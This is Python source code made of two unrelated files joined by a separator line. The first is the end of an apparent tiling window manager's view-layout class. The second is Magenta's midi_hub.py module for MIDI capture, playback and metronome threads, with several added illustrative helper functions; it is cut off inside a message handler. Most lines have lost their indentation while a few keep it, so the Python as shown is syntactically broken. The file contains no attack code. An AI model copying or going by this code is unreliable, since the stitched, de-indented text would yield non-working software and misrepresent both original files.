if ((i + w > ws_state.i + ws_state.size and delta_i > 0) or
(i < ws_state.i and delta_i < 0) or
(j + h > ws_state.j + ws_state.size and delta_j > 0) or
(j < ws_state.j and delta_j < 0)):
vf = self.find_focused_view()
if vf is not None:
self.focus_view(vf)
return
best_view = None
best_view_score = 1000.
for k, s in ws_state._view_states.items():
if not s.is_tiled:
continue
sc = _score(i, j, w, h, delta_i, delta_j, s.i, s.j, s.w, s.h)
if sc < best_view_score:
best_view_score = sc
best_view = k
if best_view is not None:
self.focus_view(self._views[best_view])
def move_next_view(self, dv: int=1, active_workspace: bool=True) -> None:
views = self.views(self.get_active_workspace() if active_workspace else None)
focused_view = self.find_focused_view()
if focused_view is not None and focused_view in views:
idx = views.index(focused_view)
next_view = views[(idx + dv)%len(views)]
self.focus_view(next_view)
elif len(views) > 0:
self.focus_view(views[0])
def move_workspace(self, ds: int=1) -> None:
ws = self.get_active_workspace()
i, ws = [(i, w) for i, w in enumerate(self.workspaces) if w._handle == ws._handle][0]
i = (i + ds) % len(self.workspaces)
ws_new = self.workspaces[i]
views = self.views(ws_new)
if ws_new.focus_view_hint is not None:
view = [v for v in views if v._handle == ws_new.focus_view_hint]
if len(view) == 1:
self.focus_view(view[0])
return
if len(views) > 0:
self.focus_view(views[0])
"""
5. Change focused view
"""
def close_focused_view(self) -> None:
view = [v for _, v in self._views.items() if v.is_focused()]
if len(view) == 0:
return
view[0].close()
def toggle_focused_view_floating(self) -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
view = self.find_focused_view()
if view is not None:
try:
s, ws_state, ws_handle = state.find_view(view)
ws = [w for w in self.workspaces if w._handle == ws_handle][0]
s1, s2 = view.toggle_floating(s, ws, ws_state)
ws_state1 = ws_state.with_view_state(view, **s1.__dict__)
ws_state2 = ws_state.replacing_view_state(view, **s2.__dict__)
ws_state2.validate_stack_indices(view)
return (state.setting_workspace_state(ws, ws_state1), state.setting_workspace_state(ws, ws_state2))
except:
return (None, state)
else:
return (None, state)
self.animate_to(reducer, conf_anim_t())
def change_focused_view_workspace(self, ds: int=1) -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
view = self.find_focused_view()
if view is not None:
try:
s, ws_state, ws_handle = state.find_view(view)
i, ws = [(i, w) for i, w in enumerate(self.workspaces) if w._handle == ws_handle][0]
if not s.is_tiled:
return None, None
i = (i + ds) % len(self.workspaces)
ws_new = self.workspaces[i]
ws_state = state.get_workspace_state(ws_new)
if ws == ws_new:
return None, None
state = state.without_view_state(view)
state0, state1 = view._show_tiled(ws_new, state, ws_state)
return (state0, state1)
except:
return (None, state)
else:
return (None, state)
self.animate_to(reducer, conf_anim_t())
def move_focused_view(self, di: int, dj: int) -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
view = self.find_focused_view()
if view is not None:
try:
s, ws_state, ws_handle = state.find_view(view)
ws = [w for w in self.workspaces if w._handle == ws_handle][0]
ws_state = ws_state.replacing_view_state(view, i=s.i+di, j=s.j+dj).focusing_view(view)
ws_state.validate_stack_indices(view)
return (None, state.setting_workspace_state(ws, ws_state))
except:
return (None, state)
else:
return (None, state)
self.animate_to(reducer, conf_anim_t())
def resize_focused_view(self, di: int, dj: int) -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
view = self.find_focused_view()
if view is not None:
try:
s = state.get_view_state(view)
i, j, w, h = s.i, s.j, s.w, s.h
w += di
h += dj
if w == 0:
w = 2
i -= 1
if h == 0:
h = 2
j -= 1
s, ws_state, ws_handle = state.find_view(view)
ws = [w for w in self.workspaces if w._handle == ws_handle][0]
ws_state = ws_state.replacing_view_state(view, i=i, j=j, w=w, h=h).focusing_view(view)
state.validate_stack_indices(view)
return (None, state.setting_workspace_state(ws, ws_state))
except:
return (None, state)
else:
return (None, state)
self.animate_to(reducer, conf_anim_t())
"""
6. Legacy
"""
def close_view(self) -> None:
self.close_focused_view()
|
midi_hub.py
|
# Copyright 2022 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module for interfacing with the MIDI environment."""
# TODO(adarob): Use flattened imports.
import abc
import collections
import queue
import re
import threading
import time
from magenta.common import concurrency
import mido
from note_seq.protobuf import music_pb2
import tensorflow.compat.v1 as tf
_DEFAULT_METRONOME_TICK_DURATION = 0.05
_DEFAULT_METRONOME_PROGRAM = 117 # Melodic Tom
_DEFAULT_METRONOME_MESSAGES = [
mido.Message(type='note_on', note=44, velocity=64),
mido.Message(type='note_on', note=35, velocity=64),
mido.Message(type='note_on', note=35, velocity=64),
mido.Message(type='note_on', note=35, velocity=64),
]
_DEFAULT_METRONOME_CHANNEL = 1
# 0-indexed.
_DRUM_CHANNEL = 9
try:
# The RtMidi backend is easier to install and has support for virtual ports.
import rtmidi # pylint: disable=unused-import,g-import-not-at-top
mido.set_backend('mido.backends.rtmidi')
except ImportError:
# Tries to use PortMidi backend by default.
tf.logging.warn('Could not import RtMidi. Virtual ports are disabled.')
class MidiHubError(Exception): # pylint:disable=g-bad-exception-name
"""Base class for exceptions in this module."""
pass
def get_available_input_ports():
"""Returns a list of available input MIDI ports."""
return mido.get_input_names()
def get_available_output_ports():
"""Returns a list of available output MIDI ports."""
return mido.get_output_names()
class MidiSignal(object):
"""A class for representing a MIDI-based event signal.
Provides a `__str__` method to return a regular expression pattern for
matching against the string representation of a mido.Message with wildcards
for unspecified values.
Supports matching for message types 'note_on', 'note_off', and
'control_change'. If a mido.Message is given as the `msg` argument, matches
against the exact message, ignoring the time attribute. If a `msg` is
not given, keyword arguments must be provided matching some non-empty subset
of those listed as a value for at least one key in `_VALID_ARGS`.
Examples:
# A signal that matches any 'note_on' message.
note_on_signal = MidiSignal(type='note_on')
# A signal that matches any 'note_on' or 'note_off' message with a pitch
# value of 4 and a velocity of 127.
note_signal = MidiSignal(note=4, velocity=127)
# A signal that matches a specific mido.Message exactly (ignoring time).
    msg = mido.Message(type='control_change', control=1, value=127)
control_1_127_signal = MidiSignal(msg=msg)
Args:
msg: A mido.Message that should be matched exactly (excluding the time
attribute) or None if wildcards are to be used.
**kwargs: Valid mido.Message arguments. Those that are not provided will be
treated as wildcards.
Raises:
MidiHubError: If the message type is unsupported or the arguments are
not in the valid set for the given or inferred type.
"""
_NOTE_ARGS = set(['type', 'note', 'program_number', 'velocity'])
_CONTROL_ARGS = set(['type', 'control', 'value'])
_VALID_ARGS = {
'note_on': _NOTE_ARGS,
'note_off': _NOTE_ARGS,
'control_change': _CONTROL_ARGS,
}
def __init__(self, msg=None, **kwargs):
if msg is not None and kwargs:
raise MidiHubError(
'Either a mido.Message should be provided or arguments. Not both.')
type_ = msg.type if msg is not None else kwargs.get('type')
if 'type' in kwargs:
del kwargs['type']
if type_ is not None and type_ not in self._VALID_ARGS:
raise MidiHubError(
"The type of a MidiSignal must be either 'note_on', 'note_off', "
"'control_change' or None for wildcard matching. Got '%s'." % type_)
# The compatible mido.Message types.
inferred_types = [type_] if type_ is not None else []
# If msg is not provided, check that the given arguments are valid for some
# message type.
if msg is None:
if type_ is not None:
for arg_name in kwargs:
if arg_name not in self._VALID_ARGS[type_]:
raise MidiHubError(
"Invalid argument for type '%s': %s" % (type_, arg_name))
else:
if kwargs:
for name, args in self._VALID_ARGS.items():
if set(kwargs) <= args:
inferred_types.append(name)
if not inferred_types:
raise MidiHubError(
'Could not infer a message type for set of given arguments: %s'
% ', '.join(kwargs))
# If there is only a single valid inferred type, use it.
if len(inferred_types) == 1:
type_ = inferred_types[0]
self._msg = msg
self._kwargs = kwargs
self._type = type_
self._inferred_types = inferred_types
def to_message(self):
"""Returns a message using the signal's specifications, if possible."""
if self._msg:
return self._msg
if not self._type:
raise MidiHubError('Cannot build message if type is not inferrable.')
return mido.Message(self._type, **self._kwargs)
def __str__(self):
"""Returns a regex pattern for matching against a mido.Message string."""
if self._msg is not None:
regex_pattern = '^' + mido.messages.format_as_string(
self._msg, include_time=False) + r' time=\d+.\d+$'
else:
# Generate regex pattern.
parts = ['.*' if self._type is None else self._type]
for name in mido.messages.SPEC_BY_TYPE[self._inferred_types[0]][
'value_names']:
if name in self._kwargs:
parts.append('%s=%d' % (name, self._kwargs[name]))
else:
parts.append(r'%s=\d+' % name)
regex_pattern = '^' + ' '.join(parts) + r' time=\d+.\d+$'
return regex_pattern
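# Illustrative sketch (not part of the original module): how a MidiSignal is
# typically matched against an incoming message. This helper is purely for
# demonstration and is never called by the module itself.
def _example_signal_match():
  """Returns True if a wildcard note_on signal matches a concrete message."""
  signal = MidiSignal(type='note_on', note=60)
  msg = mido.Message('note_on', note=60, velocity=100, time=1.25)
  return re.match(str(signal), str(msg)) is not None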
class Metronome(threading.Thread):
"""A thread implementing a MIDI metronome.
Args:
outport: The Mido port for sending messages.
qpm: The integer quarters per minute to signal on.
start_time: The float wall time in seconds to treat as the first beat
for alignment. If in the future, the first tick will not start until
after this time.
stop_time: The float wall time in seconds after which the metronome should
stop, or None if it should continue until `stop` is called.
program: The MIDI program number to use for metronome ticks.
signals: An ordered collection of MidiSignals whose underlying messages are
to be output on the metronome's tick, cyclically. A None value can be
used in place of a MidiSignal to output nothing on a given tick.
duration: The duration of the metronome's tick.
channel: The MIDI channel to output on.
"""
daemon = True
def __init__(self,
outport,
qpm,
start_time,
stop_time=None,
program=_DEFAULT_METRONOME_PROGRAM,
signals=None,
duration=_DEFAULT_METRONOME_TICK_DURATION,
channel=None):
self._outport = outport
self.update(
qpm, start_time, stop_time, program, signals, duration, channel)
super(Metronome, self).__init__()
def update(self,
qpm,
start_time,
stop_time=None,
program=_DEFAULT_METRONOME_PROGRAM,
signals=None,
duration=_DEFAULT_METRONOME_TICK_DURATION,
channel=None):
"""Updates Metronome options."""
# Locking is not required since variables are independent and assignment is
# atomic.
self._channel = _DEFAULT_METRONOME_CHANNEL if channel is None else channel
# Set the program number for the channels.
self._outport.send(
mido.Message(
type='program_change', program=program, channel=self._channel))
self._period = 60. / qpm
self._start_time = start_time
self._stop_time = stop_time
if signals is None:
self._messages = _DEFAULT_METRONOME_MESSAGES
else:
self._messages = [s.to_message() if s else None for s in signals]
self._duration = duration
def run(self):
"""Sends message on the qpm interval until stop signal received."""
sleeper = concurrency.Sleeper()
while True:
now = time.time()
tick_number = max(0, int((now - self._start_time) // self._period) + 1)
tick_time = tick_number * self._period + self._start_time
if self._stop_time is not None and self._stop_time < tick_time:
break
sleeper.sleep_until(tick_time)
metric_position = tick_number % len(self._messages)
tick_message = self._messages[metric_position]
if tick_message is None:
continue
tick_message.channel = self._channel
self._outport.send(tick_message)
if tick_message.type == 'note_on':
sleeper.sleep(self._duration)
end_tick_message = mido.Message(
'note_off', note=tick_message.note, channel=self._channel)
self._outport.send(end_tick_message)
def stop(self, stop_time=0, block=True):
"""Signals for the metronome to stop.
Args:
stop_time: The float wall time in seconds after which the metronome should
stop. By default, stops at next tick.
block: If true, blocks until thread terminates.
"""
self._stop_time = stop_time
if block:
self.join()
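# Illustrative sketch (not part of the original module): running the metronome
# for roughly four beats on an already-open output port. `outport` is assumed
# to be a mido output port.
def _example_metronome(outport, qpm=120):
  """Starts a metronome on `outport` and stops it after about four beats."""
  metronome = Metronome(outport, qpm, start_time=time.time())
  metronome.start()
  time.sleep(4 * 60. / qpm)
  metronome.stop()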
class MidiPlayer(threading.Thread):
"""A thread for playing back a NoteSequence proto via MIDI.
The NoteSequence times must be based on the wall time. The playhead matches
the wall clock. The playback sequence may be updated at any time if
`allow_updates` is set to True.
Args:
outport: The Mido port for sending messages.
sequence: The NoteSequence to play.
start_time: The float time before which to strip events. Defaults to
construction time. Events before this time will be sent immediately on
start.
allow_updates: If False, the thread will terminate after playback of
`sequence` completes and calling `update_sequence` will result in an
        exception. Otherwise, the thread will stay alive until `stop` is
called, allowing for additional updates via `update_sequence`.
channel: The MIDI channel to send playback events.
offset: The float time in seconds to adjust the playback event times by.
"""
def __init__(self, outport, sequence, start_time=time.time(),
allow_updates=False, channel=0, offset=0.0):
self._outport = outport
self._channel = channel
self._offset = offset
# Set of notes (pitches) that are currently on.
self._open_notes = set()
# Lock for serialization.
self._lock = threading.RLock()
# A control variable to signal when the sequence has been updated.
self._update_cv = threading.Condition(self._lock)
# The queue of mido.Message objects to send, sorted by ascending time.
self._message_queue = collections.deque()
# An event that is set when `stop` has been called.
self._stop_signal = threading.Event()
# Initialize message queue.
# We first have to allow "updates" to set the initial sequence.
self._allow_updates = True
self.update_sequence(sequence, start_time=start_time)
# We now make whether we allow updates dependent on the argument.
self._allow_updates = allow_updates
super(MidiPlayer, self).__init__()
@concurrency.serialized
def update_sequence(self, sequence, start_time=None):
"""Updates sequence being played by the MidiPlayer.
Adds events to close any notes that are no longer being closed by the
new sequence using the times when they would have been closed by the
previous sequence.
Args:
sequence: The NoteSequence to play back.
start_time: The float time before which to strip events. Defaults to call
time.
Raises:
MidiHubError: If called when _allow_updates is False.
"""
if start_time is None:
start_time = time.time()
if not self._allow_updates:
raise MidiHubError(
'Attempted to update a MidiPlayer sequence with updates disabled.')
new_message_list = []
# The set of pitches that are already playing and will be closed without
    # first being reopened in the new sequence.
closed_notes = set()
for note in sequence.notes:
if note.start_time >= start_time:
new_message_list.append(
mido.Message(type='note_on', note=note.pitch,
velocity=note.velocity, time=note.start_time))
new_message_list.append(
mido.Message(type='note_off', note=note.pitch, time=note.end_time))
elif note.end_time >= start_time and note.pitch in self._open_notes:
new_message_list.append(
mido.Message(type='note_off', note=note.pitch, time=note.end_time))
closed_notes.add(note.pitch)
# Close remaining open notes at the next event time to avoid abruptly ending
# notes.
notes_to_close = self._open_notes - closed_notes
if notes_to_close:
next_event_time = (
min(msg.time for msg in new_message_list) if new_message_list else 0)
for note in notes_to_close:
new_message_list.append(
mido.Message(type='note_off', note=note, time=next_event_time))
for msg in new_message_list:
msg.channel = self._channel
msg.time += self._offset
self._message_queue = collections.deque(
sorted(new_message_list, key=lambda msg: (msg.time, msg.note)))
self._update_cv.notify()
@concurrency.serialized
def run(self):
"""Plays messages in the queue until empty and _allow_updates is False."""
# Assumes model where NoteSequence is time-stamped with wall time.
# TODO(hanzorama): Argument to allow initial start not at sequence start?
while self._message_queue and self._message_queue[0].time < time.time():
self._message_queue.popleft()
while True:
while self._message_queue:
delta = self._message_queue[0].time - time.time()
if delta > 0:
self._update_cv.wait(timeout=delta)
else:
msg = self._message_queue.popleft()
if msg.type == 'note_on':
self._open_notes.add(msg.note)
elif msg.type == 'note_off':
self._open_notes.discard(msg.note)
self._outport.send(msg)
# Either keep player alive and wait for sequence update, or return.
if self._allow_updates:
self._update_cv.wait()
else:
break
def stop(self, block=True):
"""Signals for the playback to stop and ends all open notes.
Args:
block: If true, blocks until thread terminates.
"""
with self._lock:
if not self._stop_signal.is_set():
self._stop_signal.set()
self._allow_updates = False
# Replace message queue with immediate end of open notes.
self._message_queue.clear()
for note in self._open_notes:
self._message_queue.append(
mido.Message(type='note_off', note=note, time=time.time()))
self._update_cv.notify()
if block:
self.join()
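# Illustrative sketch (not part of the original module): playing a short
# wall-clock-stamped NoteSequence through a MidiPlayer. `outport` is assumed
# to be a mido output port.
def _example_playback(outport):
  """Plays two notes starting half a second from now and waits for the end."""
  sequence = music_pb2.NoteSequence()
  now = time.time()
  sequence.notes.add(pitch=60, velocity=100, start_time=now + 0.5, end_time=now + 1.0)
  sequence.notes.add(pitch=64, velocity=100, start_time=now + 1.0, end_time=now + 1.5)
  player = MidiPlayer(outport, sequence, start_time=now)
  player.start()
  player.join()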
class MidiCaptor(threading.Thread):
"""Base class for thread that captures MIDI into a NoteSequence proto.
If neither `stop_time` nor `stop_signal` are provided as arguments, the
capture will continue until the `stop` method is called.
Args:
qpm: The quarters per minute to use for the captured sequence.
start_time: The float wall time in seconds when the capture begins. Events
        occurring before this time are ignored.
stop_time: The float wall time in seconds when the capture is to be stopped
or None.
stop_signal: A MidiSignal to use as a signal to stop capture.
"""
  __metaclass__ = abc.ABCMeta
# A message that is used to wake the consumer thread.
_WAKE_MESSAGE = None
def __init__(self, qpm, start_time=0, stop_time=None, stop_signal=None):
# A lock for synchronization.
self._lock = threading.RLock()
self._receive_queue = queue.Queue()
self._captured_sequence = music_pb2.NoteSequence()
self._captured_sequence.tempos.add(qpm=qpm)
self._start_time = start_time
self._stop_time = stop_time
self._stop_regex = re.compile(str(stop_signal))
# A set of active MidiSignals being used by iterators.
self._iter_signals = []
# An event that is set when `stop` has been called.
self._stop_signal = threading.Event()
# Active callback threads keyed by unique thread name.
self._callbacks = {}
super(MidiCaptor, self).__init__()
@property
@concurrency.serialized
def start_time(self):
return self._start_time
@start_time.setter
@concurrency.serialized
def start_time(self, value):
"""Updates the start time, removing any notes that started before it."""
self._start_time = value
i = 0
for note in self._captured_sequence.notes:
if note.start_time >= self._start_time:
break
i += 1
del self._captured_sequence.notes[:i]
@property
@concurrency.serialized
def _stop_time(self):
return self._stop_time_unsafe
@_stop_time.setter
@concurrency.serialized
def _stop_time(self, value):
self._stop_time_unsafe = value
def receive(self, msg):
"""Adds received mido.Message to the queue for capture.
Args:
msg: The incoming mido.Message object to add to the queue for capture. The
time attribute is assumed to be pre-set with the wall time when the
message was received.
Raises:
MidiHubError: When the received message has an empty time attribute.
"""
if not msg.time:
raise MidiHubError(
'MidiCaptor received message with empty time attribute: %s' % msg)
self._receive_queue.put(msg)
@abc.abstractmethod
def _capture_message(self, msg):
"""Handles a single incoming MIDI message during capture.
Must be serialized in children.
Args:
msg: The incoming mido.Message object to capture. The time field is
assumed to be pre-filled with the wall time when the message was
received.
"""
pass
def _add_note(self, msg):
"""Adds and returns a new open note based on the MIDI message."""
new_note = self._captured_sequence.notes.add()
new_note.start_time = msg.time
new_note.pitch = msg.note
new_note.velocity = msg.velocity
new_note.is_drum = (msg.channel == _DRUM_CHANNEL)
return new_note
def run(self):
"""Captures incoming messages until stop time or signal received."""
while True:
timeout = None
stop_time = self._stop_time
if stop_time is not None:
timeout = stop_time - time.time()
if timeout <= 0:
break
try:
msg = self._receive_queue.get(block=True, timeout=timeout)
except queue.Empty:
continue
if msg is MidiCaptor._WAKE_MESSAGE:
continue
if msg.time <= self._start_time:
continue
if self._stop_regex.match(str(msg)) is not None:
break
with self._lock:
msg_str = str(msg)
for regex, queue_ in self._iter_signals:
if regex.match(msg_str) is not None:
queue_.put(msg.copy())
self._capture_message(msg)
stop_time = self._stop_time
end_time = stop_time if stop_time is not None else msg.time
# Acquire lock to avoid race condition with `iterate`.
with self._lock:
# Set final captured sequence.
self._captured_sequence = self.captured_sequence(end_time)
# Wake up all generators.
for regex, queue_ in self._iter_signals:
queue_.put(MidiCaptor._WAKE_MESSAGE)
def stop(self, stop_time=None, block=True):
"""Ends capture and truncates the captured sequence at `stop_time`.
Args:
stop_time: The float time in seconds to stop the capture, or None if it
should be stopped now. May be in the past, in which case the captured
sequence will be truncated appropriately.
block: If True, blocks until the thread terminates.
Raises:
MidiHubError: When called multiple times with a `stop_time`.
"""
with self._lock:
if self._stop_signal.is_set():
if stop_time is not None:
raise MidiHubError(
'`stop` must not be called multiple times with a `stop_time` on '
'MidiCaptor.')
else:
self._stop_signal.set()
self._stop_time = time.time() if stop_time is None else stop_time
# Force the thread to wake since we've updated the stop time.
self._receive_queue.put(MidiCaptor._WAKE_MESSAGE)
if block:
self.join()
def captured_sequence(self, end_time=None):
"""Returns a copy of the current captured sequence.
If called before the thread terminates, `end_time` is required and any open
notes will have their end time set to it, any notes starting after it will
be removed, and any notes ending after it will be truncated. `total_time`
will also be set to `end_time`.
Args:
end_time: The float time in seconds to close any open notes and after
which to close or truncate notes, if the thread is still alive.
Otherwise, must be None.
Returns:
A copy of the current captured NoteSequence proto with open notes closed
at and later notes removed or truncated to `end_time`.
Raises:
MidiHubError: When the thread is alive and `end_time` is None or the
thread is terminated and `end_time` is not None.
"""
# Make a copy of the sequence currently being captured.
current_captured_sequence = music_pb2.NoteSequence()
with self._lock:
current_captured_sequence.CopyFrom(self._captured_sequence)
if self.is_alive():
if end_time is None:
raise MidiHubError(
'`end_time` must be provided when capture thread is still running.')
for i, note in enumerate(current_captured_sequence.notes):
if note.start_time >= end_time:
del current_captured_sequence.notes[i:]
break
if not note.end_time or note.end_time > end_time:
note.end_time = end_time
current_captured_sequence.total_time = end_time
elif end_time is not None:
raise MidiHubError(
'`end_time` must not be provided when capture is complete.')
return current_captured_sequence
def iterate(self, signal=None, period=None):
"""Yields the captured sequence at every signal message or time period.
Exactly one of `signal` or `period` must be specified. Continues until the
captor terminates, at which point the final captured sequence is yielded
before returning.
If consecutive calls to iterate are longer than the period, immediately
yields and logs a warning.
Args:
signal: A MidiSignal to use as a signal to yield, or None.
period: A float period in seconds, or None.
Yields:
The captured NoteSequence at event time.
Raises:
      MidiHubError: If neither or both of `signal` and `period` are specified.
"""
if (signal, period).count(None) != 1:
raise MidiHubError(
'Exactly one of `signal` or `period` must be provided to `iterate` '
'call.')
if signal is None:
sleeper = concurrency.Sleeper()
next_yield_time = time.time() + period
else:
regex = re.compile(str(signal))
capture_queue = queue.Queue()
with self._lock:
self._iter_signals.append((regex, capture_queue))
while self.is_alive():
if signal is None:
skipped_periods = (time.time() - next_yield_time) // period
if skipped_periods > 0:
tf.logging.warn(
'Skipping %d %.3fs period(s) to catch up on iteration.',
skipped_periods, period)
next_yield_time += skipped_periods * period
else:
sleeper.sleep_until(next_yield_time)
end_time = next_yield_time
next_yield_time += period
else:
signal_msg = capture_queue.get()
if signal_msg is MidiCaptor._WAKE_MESSAGE:
        # This is only received when the thread is in the process of
# terminating. Wait until it is done before yielding the final
# sequence.
self.join()
break
end_time = signal_msg.time
# Acquire lock so that `captured_sequence` will be called before thread
# terminates, if it has not already done so.
with self._lock:
if not self.is_alive():
break
captured_sequence = self.captured_sequence(end_time)
yield captured_sequence
yield self.captured_sequence()
def register_callback(self, fn, signal=None, period=None):
"""Calls `fn` at every signal message or time period.
The callback function must take exactly one argument, which will be the
current captured NoteSequence.
Exactly one of `signal` or `period` must be specified. Continues until the
captor thread terminates, at which point the callback is called with the
final sequence, or `cancel_callback` is called.
If callback execution is longer than a period, immediately calls upon
completion and logs a warning.
Args:
fn: The callback function to call, passing in the captured sequence.
signal: A MidiSignal to use as a signal to call `fn` on the current
captured sequence, or None.
period: A float period in seconds to specify how often to call `fn`, or
None.
Returns:
      The unique name of the callback thread to enable cancellation.
Raises:
      MidiHubError: If neither or both of `signal` and `period` are specified.
"""
class IteratorCallback(threading.Thread):
"""A thread for executing a callback on each iteration."""
def __init__(self, iterator, fn):
self._iterator = iterator
self._fn = fn
self._stop_signal = threading.Event()
super(IteratorCallback, self).__init__()
def run(self):
"""Calls the callback function for each iterator value."""
for captured_sequence in self._iterator:
if self._stop_signal.is_set():
break
self._fn(captured_sequence)
def stop(self):
"""Stops the thread on next iteration, without blocking."""
self._stop_signal.set()
t = IteratorCallback(self.iterate(signal, period), fn)
t.start()
with self._lock:
assert t.name not in self._callbacks
self._callbacks[t.name] = t
return t.name
@concurrency.serialized
def cancel_callback(self, name):
"""Cancels the callback with the given name.
While the thread may continue to run until the next iteration, the callback
function will not be executed.
Args:
name: The unique name of the callback thread to cancel.
"""
self._callbacks[name].stop()
del self._callbacks[name]
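# Illustrative sketch (not part of the original module): registering a periodic
# callback on a running captor (for example one returned by
# MidiHub.start_capture) and cancelling it after a few seconds.
def _example_captor_callback(captor):
  """Logs the running note count once per second for five seconds."""
  def log_progress(sequence):
    tf.logging.info('Captured %d notes so far.', len(sequence.notes))
  name = captor.register_callback(log_progress, period=1.0)
  time.sleep(5.0)
  captor.cancel_callback(name)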
class MonophonicMidiCaptor(MidiCaptor):
"""A MidiCaptor for monophonic melodies."""
def __init__(self, *args, **kwargs):
self._open_note = None
super(MonophonicMidiCaptor, self).__init__(*args, **kwargs)
@concurrency.serialized
def _capture_message(self, msg):
"""Handles a single incoming MIDI message during capture.
If the message is a note_on event, ends the previous note (if applicable)
and opens a new note in the capture sequence. Ignores repeated note_on
events.
    If the message is a note_off event matching the current open note in the
    capture sequence, that note is ended.
Args:
msg: The mido.Message MIDI message to handle.
"""
if msg.type == 'note_off' or (msg.type == 'note_on' and msg.velocity == 0):
if self._open_note is None or msg.note != self._open_note.pitch:
# This is not the note we're looking for. Drop it.
return
self._open_note.end_time = msg.time
self._open_note = None
elif msg.type == 'note_on':
if self._open_note:
if self._open_note.pitch == msg.note:
# This is just a repeat of the previous message.
return
# End the previous note.
self._open_note.end_time = msg.time
self._open_note = self._add_note(msg)
class PolyphonicMidiCaptor(MidiCaptor):
"""A MidiCaptor for polyphonic melodies."""
def __init__(self, *args, **kwargs):
# A dictionary of open NoteSequence.Note messages keyed by pitch.
self._open_notes = dict()
super(PolyphonicMidiCaptor, self).__init__(*args, **kwargs)
@concurrency.serialized
def _capture_message(self, msg):
"""Handles a single incoming MIDI message during capture.
Args:
msg: The mido.Message MIDI message to handle.
"""
if msg.type == 'note_off' or (msg.type == 'note_on' and msg.velocity == 0):
if msg.note not in self._open_notes:
# This is not a note we're looking for. Drop it.
return
self._open_notes[msg.note].end_time = msg.time
del self._open_notes[msg.note]
elif msg.type == 'note_on':
if msg.note in self._open_notes:
# This is likely just a repeat of the previous message.
return
new_note = self._add_note(msg)
self._open_notes[new_note.pitch] = new_note
class TextureType(object):
"""An Enum specifying the type of musical texture."""
MONOPHONIC = 1
POLYPHONIC = 2
class MidiHub(object):
"""A MIDI interface for capturing and playing NoteSequences.
Ignores/filters `program_change` messages. Assumes all messages are on the
same channel.
Args:
    input_midi_ports: A list of string MIDI port names or mido.ports.BaseInput
        objects to use for input. If a name is given that is not an available
        port, a virtual port will be opened with that name.
    output_midi_ports: A list of string MIDI port names or mido.ports.BaseOutput
        objects to use for output. If a name is given that is not an available
        port, a virtual port will be opened with that name.
texture_type: A TextureType Enum specifying the musical texture to assume
during capture, passthrough, and playback.
passthrough: A boolean specifying whether or not to pass incoming messages
through to the output, applying the appropriate texture rules.
playback_channel: The MIDI channel to send playback events.
playback_offset: The float time in seconds to adjust the playback event
times by.
"""
def __init__(self, input_midi_ports, output_midi_ports, texture_type,
passthrough=True, playback_channel=0, playback_offset=0.0):
self._texture_type = texture_type
self._passthrough = passthrough
self._playback_channel = playback_channel
self._playback_offset = playback_offset
# When `passthrough` is True, this is the set of open MIDI note pitches.
self._open_notes = set()
# This lock is used by the serialized decorator.
self._lock = threading.RLock()
# A dictionary mapping a compiled MidiSignal regex to a condition variable
    # that will be notified when a matching message is received.
self._signals = {}
# A dictionary mapping a compiled MidiSignal regex to a list of functions
# that will be called with the triggering message in individual threads when
# a matching message is received.
self._callbacks = collections.defaultdict(list)
# A dictionary mapping integer control numbers to most recently-received
# integer value.
self._control_values = {}
# Threads actively being used to capture incoming messages.
self._captors = []
# Potentially active player threads.
self._players = []
self._metronome = None
# Open MIDI ports.
inports = []
if input_midi_ports:
for port in input_midi_ports:
if isinstance(port, mido.ports.BaseInput):
inport = port
else:
virtual = port not in get_available_input_ports()
if virtual:
tf.logging.info(
"Opening '%s' as a virtual MIDI port for input.", port)
inport = mido.open_input(port, virtual=virtual)
# Start processing incoming messages.
inport.callback = self._timestamp_and_handle_message
inports.append(inport)
# Keep references to input ports to prevent deletion.
self._inports = inports
else:
tf.logging.warn('No input port specified. Capture disabled.')
self._inports = None
outports = []
for port in output_midi_ports:
if isinstance(port, mido.ports.BaseOutput):
outports.append(port)
else:
virtual = port not in get_available_output_ports()
if virtual:
tf.logging.info(
"Opening '%s' as a virtual MIDI port for output.", port)
outports.append(mido.open_output(port, virtual=virtual))
self._outport = mido.ports.MultiPort(outports)
def __del__(self):
"""Stops all running threads and waits for them to terminate."""
for captor in self._captors:
captor.stop(block=False)
for player in self._players:
player.stop(block=False)
self.stop_metronome()
for captor in self._captors:
captor.join()
for player in self._players:
player.join()
@property
@concurrency.serialized
def passthrough(self):
return self._passthrough
@passthrough.setter
@concurrency.serialized
def passthrough(self, value):
"""Sets passthrough value, closing all open notes if being disabled."""
if self._passthrough == value:
return
# Close all open notes.
while self._open_notes:
self._outport.send(mido.Message('note_off', note=self._open_notes.pop()))
self._passthrough = value
def _timestamp_and_handle_message(self, msg):
"""Stamps message with current time and passes it to the handler."""
if msg.type == 'program_change':
return
if not msg.time:
msg.time = time.time()
self._handle_message(msg)
@concurrency.serialized
def _handle_message(self, msg):
"""Handles a single incoming MIDI message.
-If the message is being used as a signal, notifies threads waiting on the
appropriate condition variable.
-Adds the message to any capture queues.
-Passes the message through to the output port, if appropriate.
Args:
msg: The mido.Message MIDI message to handle.
"""
# Notify any threads waiting for this message.
msg_str = str(msg)
for regex in list(self._signals):
if regex.match(msg_str) is not None:
self._signals[regex].notify_all()
del self._signals[regex]
# Call any callbacks waiting for this message.
for regex in list(self._callbacks):
if regex.match(msg_str) is not None:
for fn in self._callbacks[regex]:
threading.Thread(target=fn, args=(msg,)).start()
del self._callbacks[regex]
# Remove any captors that are no longer alive.
self._captors[:] = [t for t in self._captors if t.is_alive()]
# Add a different copy of the message to the receive queue of each live
# capture thread.
for t in self._captors:
t.receive(msg.copy())
# Update control values if this is a control change message.
if msg.type == 'control_change':
if self._control_values.get(msg.control, None) != msg.value:
tf.logging.debug('Control change %d: %d', msg.control, msg.value)
self._control_values[msg.control] = msg.value
# Pass the message through to the output port, if appropriate.
if not self._passthrough:
pass
